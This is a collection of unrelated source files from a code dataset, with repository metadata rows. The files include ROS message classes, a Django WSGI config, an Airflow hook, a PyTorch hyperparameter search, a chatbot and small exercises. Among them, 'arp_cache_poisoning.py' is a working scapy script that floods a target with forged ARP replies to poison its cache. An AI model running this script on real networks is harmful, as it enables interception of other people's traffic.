def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 3
(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref,) = _get_struct_3B().unpack(str[start:end])
self.zero_gyros = bool(self.zero_gyros)
self.reset_ekf = bool(self.reset_ekf)
self.set_mag_ref = bool(self.set_mag_ref)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3B = None
def _get_struct_3B():
global _struct_3B
if _struct_3B is None:
_struct_3B = struct.Struct("<3B")
return _struct_3B
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from um7/ResetResponse.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class ResetResponse(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "um7/ResetResponse"
_has_header = False # flag to mark the presence of a Header object
_full_text = """
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ResetResponse, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
class Reset(object):
_type = 'um7/Reset'
_md5sum = '626ea3efbc6874926126840202a803dd'
_request_class = ResetRequest
_response_class = ResetResponse
| [
"[email protected]"
] | |
90353abd39008a6c7583f09e1b4866b8af3d8af2 | 7d4bfd9c8970de5abd143fcb5ff3f3927f4bf1b0 | /cardiotronics/wsgi.py | 7f76acab2ead5e8cb7aa7a960c987b95a0e89efa | [] | no_license | devthoughtwin/demo2 | 055f871bea7c84e36de386c1dd25effb38f9f88e | e99230161ae0d2f85a689ceab7794a2323415168 | refs/heads/master | 2020-04-22T15:31:35.826542 | 2019-02-13T09:38:01 | 2019-02-13T09:38:01 | 170,480,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for cardiotronics project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cardiotronics.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
0bb5c2d6d7765116dfc6e179cc86266981d8112f | 3cabfd6ad2d1477b579dadb959d74931daf67c3c | /data_structure/sets/12_max_and_min_in_set.py | d20a10a4196f028f4a3f6af8bc0499493de53c1a | [] | no_license | SunnyRaj94/Basic-Python-And-Data-Structures | 1a7100d91d3bbd82157feb7bcbd105c8bc7fd765 | 726c044773a0fe7146356c0bee28805eea6d15e2 | refs/heads/master | 2020-11-25T07:27:47.441078 | 2019-12-21T07:23:39 | 2019-12-21T07:23:39 | 228,556,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | """
Created on 13/12/2019
@author: Sunny Raj
"""
"""
problem statement:
Write a Python program to find maximum and the minimum value in a set
"""
#creating sample set
my_set=set({"apple", "banana", "cherry","potato","xyz"})
#finding maximum value from set
maximum_value = max(my_set)
# finding minimum value from set
minimum_value= min(my_set)
#printing maximum value obtained
print(maximum_value)
#printing minimum value obtained
print(minimum_value)
| [
"[email protected]"
] | |
24a26fa415a828860233baf76ad7bf89ad51c567 | 332b5d15535d2286a98b390ed224a233a56634ed | /responses.py | c92fb67e14645f84bca00652dcfcdf136781abda | [] | no_license | sonixboost/zxtelebot | da11ef7795989bb7dd6909a91815c65356ca1c7b | ae00609c65ea5a9260866d69f1caff80f57291ba | refs/heads/main | 2023-04-22T05:08:20.374621 | 2021-05-18T18:09:07 | 2021-05-18T18:09:07 | 368,620,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | from datetime import datetime
def hello():
return "Hello!👋 How are you"
def who():
return "I am ZiXu_bot, created by the awesome ZiXu."
def time():
now = datetime.now()
date_time = now.strftime("Date: %d/%m/%y, Time: %H:%M:%S")
return date_time
def love():
return "I love you baby~~~~~~~~<3"
def response(input_text):
user_message = str(input_text).lower()
responses_dict = {
("hello","hi","sup"):hello,
("who are you", "who are you?"):who,
("time","time?"): time,
("bernice", "baby"): love,
}
def checker(user_message, responses_dict):
for keys in responses_dict.keys():
if user_message in keys:
func = responses_dict.get(keys)
return func()
return False
return checker(user_message, responses_dict) | [
"[email protected]"
] | |
b1ed8994ed68e46f1967482e6b2a55482c7492c3 | a16d190c16781bf4fde5960673d2897e469e0174 | /flink-ai-flow/lib/airflow/airflow/providers/google/cloud/hooks/os_login.py | c7a4234055f6bea72f78ce70789ceabe2f89d609 | [
"Apache-2.0",
"MIT",
"Python-2.0",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | bgeng777/flink-ai-extended | 742a1bb80d07c090c3ecb960394422896b5899d7 | f83b5d661240c45c767002767c0cbddc847fff81 | refs/heads/master | 2023-08-15T00:32:40.260537 | 2021-07-27T04:20:53 | 2021-07-27T04:20:53 | 349,360,984 | 1 | 2 | Apache-2.0 | 2021-05-20T03:05:56 | 2021-03-19T09:03:50 | Python | UTF-8 | Python | false | false | 3,582 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Dict, Optional, Sequence, Union
from google.cloud.oslogin_v1 import OsLoginServiceClient
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class OSLoginHook(GoogleBaseHook):
"""
Hook for Google OS login APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
self,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._conn = None # type: Optional[OsLoginServiceClient]
def get_conn(self) -> OsLoginServiceClient:
"""Return OS Login service client"""
if self._conn:
return self._conn
self._conn = OsLoginServiceClient(credentials=self._get_credentials(), client_info=self.client_info)
return self._conn
@GoogleBaseHook.fallback_to_default_project_id
def import_ssh_public_key(
self, user: str, ssh_public_key: Dict, project_id: str, retry=None, timeout=None, metadata=None
):
"""
Adds an SSH public key and returns the profile information. Default POSIX
account information is set when no username and UID exist as part of the
login profile.
:param user: The unique ID for the user
:type user: str
:param ssh_public_key: The SSH public key and expiration time.
:type ssh_public_key: dict
:param project_id: The project ID of the Google Cloud project.
:type project_id: str
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
:type retry: Optional[google.api_core.retry.Retry]
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that
if ``retry`` is specified, the timeout applies to each individual attempt.
:type timeout: Optional[float]
:param metadata: Additional metadata that is provided to the method.
:type metadata: Optional[Sequence[Tuple[str, str]]]
:return: A :class:`~google.cloud.oslogin_v1.types.ImportSshPublicKeyResponse` instance.
"""
conn = self.get_conn()
return conn.import_ssh_public_key(
parent=OsLoginServiceClient.user_path(user=user),
ssh_public_key=ssh_public_key,
project_id=project_id,
retry=retry,
timeout=timeout,
metadata=metadata,
)
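

# Minimal usage sketch (hypothetical values; needs valid Google Cloud credentials
# behind the Airflow connection):
#   hook = OSLoginHook(gcp_conn_id='google_cloud_default')
#   hook.import_ssh_public_key(
#       user='[email protected]',
#       ssh_public_key={'key': 'ssh-rsa AAAA...', 'expiration_time_usec': 0},
#       project_id='example-project')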
| [
"[email protected]"
] | |
b52a2f79ce8ccee0bb833b2d3ba50d39c0fa1b60 | bdb1ff6a8cb36f850ea80a91abf9ddbcf2fc23bd | /gild/views.py | f45a754f45abe5afd28b03bb279cbffdabff3151 | [] | no_license | imclab/gild | 8c56d01b9a878dc21c8230089353ab5036a947f4 | 16bee94bb5a476278bb3a8e06e0dbff4975c947f | refs/heads/master | 2020-06-05T00:34:31.568573 | 2014-04-30T15:54:46 | 2014-04-30T15:54:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | # -*- coding: utf-8 -*-
##########################################################################
# Copyright (C) CEA - Neurospin, 2014
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""cubicweb-gild views/forms/actions/components for web ui"""
| [
"[email protected]"
] | |
4de587cab3ba533750991bf0b37d5bde16fce5ee | c62870089bfa398f8b684386f0ae68cc5dcea55d | /exercicios/exe18.py | 106d79caa2e00fc96455a7a6f501d6b71548483a | [] | no_license | GGreenBow/Python-Facul | 828f6d8b5fce46769f47ab49de0da7fbe8422e5c | b9d3d356fdc3881434d52838b158f35f78f2a770 | refs/heads/master | 2023-06-23T00:40:34.318098 | 2021-07-21T17:06:21 | 2021-07-21T17:06:21 | 388,188,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | num=[0]*10
i=0
while (i<10):
num[i]=int(input('Digite um valor: '))
i=i+1
i=9
while (i>=0):
    print('%d | ' % num[i], end="")
i=i-1
| [
"[email protected]"
] | |
ab624a2187ca3b5fce74ed60065aba42b9cacf56 | dea0c71edbb8ca367ac478054d4599b5a42cf518 | /cifar/vgg/thousandtwentyfour/hyper1024.py | e637a77a2200f7875a542802ecb9ce8c1a6cebf2 | [] | no_license | yngtodd/paperspace | a8e394de4782a8f4a2b01c7a33658d9124f16168 | 740bf0290305cca09c385b58a550e0842147c210 | refs/heads/master | 2020-03-08T04:11:18.689813 | 2018-06-30T00:14:21 | 2018-06-30T00:14:21 | 127,914,212 | 0 | 0 | null | 2018-06-27T16:36:25 | 2018-04-03T13:40:05 | Python | UTF-8 | Python | false | false | 4,183 | py | '''Distributed Hyperparameter Optimization of VGG over CIFAR10 with PyTorch.'''
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
from utils import get_train_valid_loader
#from model import VGG
from adaptive_model import VGG
from hyperspace import hyperdrive
parser = argparse.ArgumentParser(description='Setup experiment.')
parser.add_argument('--results_dir', type=str, help='Path to results directory.')
parser.add_argument('--use_cuda', type=bool, default=True, help='Whether to use cuda.')
parser.add_argument('--deadline', type=int, default=86400, help='Deadline (seconds) to finish within.')
args = parser.parse_args()
if args.use_cuda and not torch.cuda.is_available():
print("Cuda not available, using CPU!")
use_cuda = False
else:
use_cuda = True
print("Is cuda available: {}".format(torch.cuda.is_available()))
print("Is the model using cuda: {}".format(use_cuda))
trainloader, validloader = get_train_valid_loader()
classes = ('plane', 'car', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck')
def objective(params):
kernel1 = int(params[0])
kernel2 = int(params[1])
kernel3 = int(params[2])
kernel4 = int(params[3])
kernel5 = int(params[4])
kernel6 = int(params[5])
kernel7 = int(params[6])
kernel8 = int(params[7])
dropout5 = float(params[8])
dropout6 = float(params[9])
net = VGG(kernel1=kernel1, kernel2=kernel2, kernel3=kernel3,
              kernel4=kernel4, kernel5=kernel5, kernel6=kernel6,
              kernel7=kernel7, kernel8=kernel8, dropout5=dropout5,
dropout6=dropout6)
if use_cuda and torch.cuda.device_count() > 1:
net = nn.DataParallel(net)
net.cuda()
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters())
num_epochs = 20
for _ in range(num_epochs):
# Training
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
optimizer.zero_grad()
inputs, targets = Variable(inputs), Variable(targets)
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.data[0]
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
#print("Train loss: {}".format(train_loss))
# Validation
net.eval()
val_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(validloader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs, volatile=True), Variable(targets)
outputs = net(inputs)
loss = criterion(outputs, targets)
val_loss += loss.data[0]
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
#print("Validation loss: {}".format(val_loss))
#clean up
del inputs, targets
torch.cuda.empty_cache()
return val_loss
def main():
    hparams = [(2, 10), # kernel1
               (2, 10), # kernel2
               (2, 10), # kernel3
               (2, 10), # kernel4
               (2, 10), # kernel5
               (2, 10), # kernel6
               (2, 10), # kernel7
               (2, 10), # kernel8 (objective unpacks 10 params)
               (0.25, 0.95), # dropout5
               (0.25, 0.95)] # dropout6
hyperdrive(objective=objective,
hyperparameters=hparams,
results_path=args.results_dir,
model="GP",
n_iterations=15,
verbose=True,
sampler="lhs",
n_samples=4,
random_state=0,
deadline=args.deadline)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
94a2319431d5a1836af583129c04d896ed455287 | 5bfa6d39ca5999f24d5c054cf26d4112156d6842 | /Practice/Numpy/Concatenate.py | edc82a12fcea24b32ec3c9ea9c95350a79a2b776 | [] | no_license | CompetitiveCode/hackerrank-python | 3ad7f70f3d09149242b2ab6b27d0e4ec2a188837 | 898e6bf791791cbdeca9192c78c623a115b4c97b | refs/heads/master | 2022-02-03T23:14:57.866923 | 2019-05-30T11:34:01 | 2019-05-30T11:34:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | #Answer to Concatenate
import numpy
n,m,p=input().split()
a,b=[],[]
for i in range(int(n)):
a.append(list(map(int,input().split())))
for i in range(int(m)):
b.append(list(map(int,input().split())))
a,b=numpy.array(a),numpy.array(b)
print(numpy.concatenate((a,b),axis=0))
"""
Concatenate
Two or more arrays can be concatenated together using the concatenate function with a tuple of the arrays to be joined:
import numpy
array_1 = numpy.array([1,2,3])
array_2 = numpy.array([4,5,6])
array_3 = numpy.array([7,8,9])
print numpy.concatenate((array_1, array_2, array_3))
#Output
[1 2 3 4 5 6 7 8 9]
If an array has more than one dimension, it is possible to specify the axis along which multiple arrays are concatenated. By default, it is along the first dimension.
import numpy
array_1 = numpy.array([[1,2,3],[0,0,0]])
array_2 = numpy.array([[0,0,0],[7,8,9]])
print numpy.concatenate((array_1, array_2), axis = 1)
#Output
[[1 2 3 0 0 0]
[0 0 0 7 8 9]]
""" | [
"[email protected]"
] | |
0a28b4b247fd117a5d0d5c702b2a3eb2cd5b5ec6 | 5996fef397944db5386726b4132550b78b53d1f3 | /tests/dedupe/test_linker.py | 9b46c4374bd040fcf8c2c1eeb1383c073748fc48 | [
"MIT"
] | permissive | vishalbelsare/followthemoney | 5b38178021d3781f0576b80a9f7d59abd0d59440 | 7b7e8aebd61a59d45986da07c6cdc764573e79a6 | refs/heads/master | 2023-03-15T23:27:12.326274 | 2022-02-03T07:55:39 | 2022-02-03T07:55:39 | 187,406,996 | 0 | 0 | MIT | 2023-03-06T10:58:49 | 2019-05-18T21:28:27 | Python | UTF-8 | Python | false | false | 1,397 | py | from unittest import TestCase
from copy import deepcopy
from followthemoney import model
from followthemoney.dedupe import Linker, Match
SAMPLE = {
"decision": False,
"canonical": {"id": "can", "schema": "Person", "properties": {"name": ["Tom"]}},
"entity": {
"id": "ent",
"schema": "LegalEntity",
"properties": {"name": ["Thomas"]},
},
}
class LinkerTestCase(TestCase):
def test_linker(self):
match = Match(model, deepcopy(SAMPLE))
match.decision = True
passport = model.get_proxy(
{"id": "pass", "schema": "Passport", "properties": {"holder": ["ent"]}}
)
linker = Linker(model)
linker.add(match)
out = linker.apply(match.entity)
assert out.id == "can", out
out = linker.apply(passport)
assert "can" in out.get("holder"), out
assert "ent" not in out.get("holder"), out
def test_linker_noop(self):
match = Match(model, deepcopy(SAMPLE))
passport = model.get_proxy(
{"id": "pass", "schema": "Passport", "properties": {"holder": ["ent"]}}
)
linker = Linker(model)
linker.add(match)
out = linker.apply(match.entity)
assert out.id == "ent", out
out = linker.apply(passport)
assert "ent" in out.get("holder"), out
assert "can" not in out.get("holder"), out
| [
"[email protected]"
] | |
8e08c4149e369c61f69512cf461af1096533371c | 713d349dd0db1f326ee0e5b6e8317ecfe5ad69b5 | /myblog/blog/urls.py | b59694e3eca182829e8a8fb442057151cb435d18 | [] | no_license | miaomiaobupang/Python | 499aab171f9d4fd38320b8b890370eb3f738cc81 | a1e3128ebb8e97765df4434256b18dd72c03a7c6 | refs/heads/master | 2020-03-20T07:38:36.444380 | 2018-06-23T05:17:54 | 2018-06-23T05:17:54 | 137,287,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | from django.urls import path
from . import views
app_name = 'blog'
urlpatterns = [
path('index',views.index),
path('article/<int:article_id>/',views.article_page,name='article_page'),
path('edit/<int:article_id>/',views.article_edit,name='article_edit'),
path('add',views.add_page,name='add_page'),
path('create',views.create_page,name='add_action'),
path('action/<int:article_id>/',views.edit_action,name='edit_action')
]
| [
"[email protected]"
] | |
2f058eedc859c6e1bf03f752e6e7186e3d04ef01 | f07b8fa5b644a87469714ed3959a86e00b020d8f | /main.py | 86ea2ab85007326ccfdb295cacad777552a25014 | [] | no_license | UnschooledGamer/alex | 2e0ac30c084cc76ca11b09e8ac251585d6c92a9f | 1a8d0feed79ef2b26ffdf8b87b2aa3853bf22bec | refs/heads/main | 2023-02-01T08:50:01.735352 | 2020-12-19T17:44:18 | 2020-12-19T17:44:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | from flask import Flask, render_template, request
from threading import Timer
import webbrowser
import requests
import json
import uuid
import os
app = Flask(__name__)
myBid = "153894" # This value can be changed to use your own bot
myKey = "C8abK8Xqt0iqeEEK" # This value can be changed to use your own bot
#define app routes
@app.route("/")
def index():
return render_template("index.html")
def open_browser():
webbrowser.open_new('http://127.0.0.1:2000/')
def serial_num():
var = str(uuid.uuid1(uuid.getnode(),0))[24:]
try:
username = os.getlogin()
except Exception as e:
print(e)
print("Unable to get username")
username = "Unknown User"
var = var + "+" + username
print(var)
return var
@app.route("/get")
#function for the bot response
def get_bot_response():
userText = request.args.get('msg')
answer = give_answer(userText)
return str(answer)
def give_answer(givenText):
uid = serial_num()
url = "http://api.brainshop.ai/get?bid="+myBid+"&key="+myKey+"&uid="+uid+"&msg="+givenText
response = requests.get(url)
parsed = json.loads(response.text)['cnt']
return parsed
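
# Usage sketch (requires a live BrainShop bot; the bid/key above must be valid):
#   give_answer('hello') -> the bot's reply text parsed from the JSON 'cnt' field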
if __name__ == "__main__":
print(serial_num())
    Timer(1, open_browser).start()
app.run(port=2000)
| [
"[email protected]"
] | |
7cb79c4d8387b7a7aec5b197792b6b5c4cc69396 | 00df602d82f04b85dde5b0d2f9fb7690e2c3b94c | /main.py | f1f4cbf015e3701fd91a9a10d38a0ce4ab24e0db | [] | no_license | mjavidiq/number-wordify | 2f67a13650ae83b14b7ea0f3f2cf2d0008a6b493 | 65eed390a65fa27e021e5e5d2d6be4a7dfae04ff | refs/heads/master | 2021-10-25T05:20:27.892364 | 2019-04-01T21:41:48 | 2019-04-01T21:41:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import argparse
from number_to_words import *
from words_to_number import *
from all_wordifications import *
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number", action = "store",
dest = "number", help = "Find a single wordification of phone number")
parser.add_argument("-w", "--word", action = "store",
dest = "word", help = "Convert wordified number to phone number")
parser.add_argument("-a", "--all", action = "store",
dest = "all", help = "Find all wordifications of phone number")
parser.add_argument("-d", "--dict", action = "store",
dest = "dict", default = "./language/words_alpha.txt",
help = "Specify custom dictionary")
def main(args):
# Wordify a given phone number and print out one wordification
if args.number != None:
w = number_to_words(args.number, args.dict)
print("Wordified number:", w)
return w
# De-wordify a string into the form 1-800-123-4567
if args.word != None:
n = words_to_number(args.word)
print("Number from wordification:", n)
return n
    # Wordify a given phone number and print out all possible wordifications
if args.all != None:
all_w = all_wordifications(args.all, args.dict)
print("Found {} wordifications".format(len(all_w)))
for i,w in enumerate(all_w):
print(i+1, w)
return all_w
if __name__ == "__main__":
args = parser.parse_args()
main(args) | [
"[email protected]"
] | |
be4d6e900bc57ce2ac2d93dffe63b33287765b57 | c8f83fae4d09d6129f1531499138d1b72e7a91e6 | /week3/PandaSocialNetwork/pandaSocial.py | 0ed12eacf067bfcc584330350ed82c203abdb094 | [] | no_license | slavyana-monkova/Programming101-3 | 4234ce5c3a0730f816e6bdf688b951a12855e6c3 | d9a89b8c7091553214f817c1bf733171f08ab4dd | refs/heads/master | 2021-05-30T20:12:32.562121 | 2016-03-19T13:47:43 | 2016-03-19T13:47:43 | 36,850,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,488 | py | import json
from Panda import Panda2
class PandaSocialNetwork():
def __init__(self):
self.network = {}
def pandas(self):
        return list(self.network.keys())  # the pandas currently in the network
def has_panda(self, panda):
return panda in self.network
def are_friends(self, panda1, panda2):
return panda1 in self.network[panda2] and panda2 in self.network[panda1]
def add_panda(self, panda):
if self.has_panda(panda):
raise Exception('Panda already there')
self.network[panda] = []
def make_friend(self, panda1, panda2):
if not self.has_panda(panda1):
self.add_panda(panda1)
if not self.has_panda(panda2):
self.add_panda(panda2)
if self.are_friends(panda1, panda2):
raise Exception("Panda are already friends")
self.network[panda1].append(panda2)
self.network[panda2].append(panda1)
def friends_of(self, panda):
if panda not in self.network:
            raise Exception('Panda is not in the network')
return self.network[panda]
def connection_level(self, panda1, panda2):
if self.friends_of(panda2) == []:
return False
        if panda1 not in self.network or panda2 not in self.network:
            return False
if self.are_friends(panda1, panda2):
return 1
queue = []
path = [panda1]
queue.append(path)
while queue:
path = queue.pop(0)
node = path[-1]
if node == panda2:
return len(path)-1
for adjacent in self.network[node]:
new_path = list(path)
new_path.append(adjacent)
queue.append(new_path)
return -1
def panda_connections(self, panda):
connections = {}
q = []
visited = set()
q.append((0, panda))
visited.add(panda)
while len(q) != 0:
panda_data = q.pop(0)
current_level = panda_data[0]
current_node = panda_data[1]
connections[current_node] = current_level
for neighboor in self.network[current_node]:
if neighboor not in visited:
visited.add(neighboor)
q.append((current_level+1, neighboor))
return connections
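
    # panda_connections is a plain breadth-first search from `panda`: the returned
    # dict maps each reachable panda to its hop distance, e.g. after
    # make_friend(a, b) and make_friend(b, c) it yields {a: 0, b: 1, c: 2}.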
def connection_level2(self, panda1, panda2):
panda_table = self.panda_connections(panda1)
if panda2 not in panda_table:
return -1
return panda_table[panda2]
def genders_in_network(self, level, gender, panda):
panda_table = self.panda_connections(panda)
counter = 0
for panda in panda_table:
p_level = panda_table[panda]
if p_level != 0 and p_level <= level and panda.gender() == gender:
counter += 1
return counter
def __repr__(self):
for_save = {}
for panda in self.network:
friends = [repr(panda_friend) for panda_friend in self.network[panda]]
for_save[repr(panda)] = friends
return for_save
def save(self, filename):
with open(filename, "w") as f:
f.write(json.dumps(self.__repr__(), indent=True))
    @staticmethod
    def load(filename):
with open(filename, "r") as f:
contents = f.read()
json_network = json.loads(contents)
network = PandaSocialNetwork()
for panda in json_network:
for friends in json_network[panda]:
p1 = eval(panda)
p2 = eval(friends)
                if not network.are_friends(p1, p2):
network.make_friend(p1, p2)
return network
def are_connected(self, panda1, panda2):
if self.connection_level(panda1, panda2) > 0:
return True
return False
def how_many_gender_in_network(level, panda, gender):
pass
network = PandaSocialNetwork()
ivo = Panda2("Ivo", "[email protected]", "male")
rado = Panda2("Rado", "[email protected]", "male")
tony = Panda2("Tony", "[email protected]", "female")
buby = Panda2("bobi", "[email protected]", "female")
for panda in [ivo, rado, tony,buby]:
network.add_panda(panda)
print(network.__dict__)
network.make_friend(ivo, rado)
network.make_friend(rado, tony)
#print(network.connection_level(ivo, tony) == 2)
print(network.connection_level(ivo,buby))
#print(network.are_connected(ivo, rado))
print(network.are_connected(ivo, buby))
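# Extra usage sketch (not part of the original demo): exercise the BFS
# helpers. Assumes Panda2 objects are hashable and expose gender()
# returning the value passed to the constructor.
print(network.panda_connections(ivo))                # {panda: hops from ivo}
print(network.connection_level2(ivo, tony))          # expected 2 (via rado)
print(network.connection_level2(ivo, buby))          # expected -1, buby is isolated
print(network.genders_in_network(2, "female", ivo))  # tony -> expected 1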
| [
"[email protected]"
] | |
99155f8328c039b59341ac316c315a792b8f6555 | 6bc658917b14ca0bcd4900dbdaf0b32bb3e5a829 | /arp_cache_poisoning.py | 831777265e3253a78f5b424b421b1bcbf3f9cdda | [] | no_license | AsherDLL/Sec-tools | 556745925ed1d33c60e8a0ad88245bf91df580fd | 8188fe07df8cba5b9a2435b423bfe8c108b2a95f | refs/heads/master | 2021-07-12T02:25:09.205998 | 2020-05-29T19:00:16 | 2020-05-29T19:00:16 | 144,144,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | #A noisy arp-poisoning attack
#!/usr/bin/python
import sys
import time
from scapy.all import sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + ": <target> <spoof_ip>"
sys.exit(1)
iface = "ens33"  # network interface to inject on (environment-specific)
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
    # re-send every second so the poisoned ARP entry never expires
    sendp(packet, iface=iface)
    time.sleep(1)
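# Cleanup sketch (MAC address is a placeholder): to restore the victim's
# ARP cache on exit, send the correct mapping a few times:
#   real_mac = "aa:bb:cc:dd:ee:ff"  # the spoofed IP's real MAC
#   fix = Ether() / ARP(pdst=target_ip, psrc=fake_ip, hwsrc=real_mac, op="is-at")
#   sendp(fix, iface=iface, count=5)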
| [
"[email protected]"
] | |
606bd8620f59bf21b2155102fa38a59e4ffe425e | 4842f6eec5257c5546215f84b92c9081fb485dbd | /F5SearchToolFunction/ConfigSearchFunctions.py | e0ade37ca9206ed830d2137b01c30dca313bae30 | [] | no_license | stttt2003pk/stttt2003pk_f5_config_read | 4398764562a69658208198f884e12bca883ee417 | 245f55563d122d5bf42b56e4853f53cb577645db | refs/heads/master | 2021-01-09T06:25:57.984373 | 2017-02-05T13:22:47 | 2017-02-05T13:22:47 | 80,986,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,499 | py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os, sys
cur_dir = os.path.dirname(os.path.abspath(__file__))
pack_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
#print pack_dir
if pack_dir:
sys.path.append(pack_dir)
import F5ToolPackage
import re
__author__ = 'stttt2003pk'
'''
make some functions to search the Config more easily
'''
class ConfigSearchFunctions(object):
def __init__(self):
self.__WideIpToGtmPoolV11 = ''
self.__WideIpToServerListV11 = []
self.__IpToVsListV11 = []
self.__VsToHttpClassV11 = None
self.__VsToProfilesV11 = None
self.__VsIpList = []
self.__LtmMonitorList=[]
self.__LtmPoolList=[]
self.__LtmVsList=[]
def SetLtmConfigV11(self, LtmConfigFileNameV11):
self.__LtmConfigV11 = F5ToolPackage.GetF5V11LtmConfig(LtmConfigFileNameV11)
def SetGtmConfigV11(self, GtmConfigFileNameV11):
self.__GtmConfigV11 = F5ToolPackage.GetF5V11GtmConfig(GtmConfigFileNameV11)
def SetGtmConfigV10(self, GtmConfigFileNameV10):
self.__GtmConfigV10 = F5ToolPackage.GetF5V10GtmConfig(GtmConfigFileNameV10)
@property
def VsSet(self):
return self.__LtmConfigV11.VsSet
@property
def LtmConfigV11(self):
return self.__LtmConfigV11
@property
def LtmPoolSet(self):
